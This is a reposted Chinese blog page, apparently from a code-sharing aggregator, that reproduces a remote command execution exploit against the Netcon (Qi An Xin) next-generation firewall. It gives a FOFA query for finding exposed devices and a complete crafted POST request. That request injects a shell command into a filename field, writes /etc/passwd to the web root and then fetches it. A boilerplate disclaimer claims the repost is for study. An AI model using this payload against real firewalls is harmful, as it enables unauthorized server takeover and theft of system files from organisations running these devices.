碼上歡樂
相關內容    簡體    繁體

奇安信 網康下一代防火牆 RCE

本文轉載自   查看原文   2022-03-29 10:39   773    網絡安全

漏洞概述

存在遠程命令執行,漏洞攻擊者可以獲取服務器權限。

FOFA

app="網康科技-下一代防火牆"

漏洞復現

進入登錄頁面抓包

 

 

 

 構造數據包

變更發包方式:POST /directdata/direct/router HTTP/1.1
添加POST數據:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

 

 

 構造數據包

變更發包方式:GET /test.txt HTTP/1.1

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 【復現】奇安信 網康下一代防火牆 RCE 2021年HW0day-奇安信 網康下一代防火牆 RCE漏洞細節 2021年最新HW漏洞奇安信防火牆網康下一代RCE漏洞細節參考 天融信下一代防火牆(NGFW) .NET 5 - 下一代.NET JupyterLab,極其強大的下一代notebook! Fetch:下一代 Ajax 技術 Pulsar 下一代消息平台 下一代Jquery模板-----JsRender Podman - 下一代Linux容器工具
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM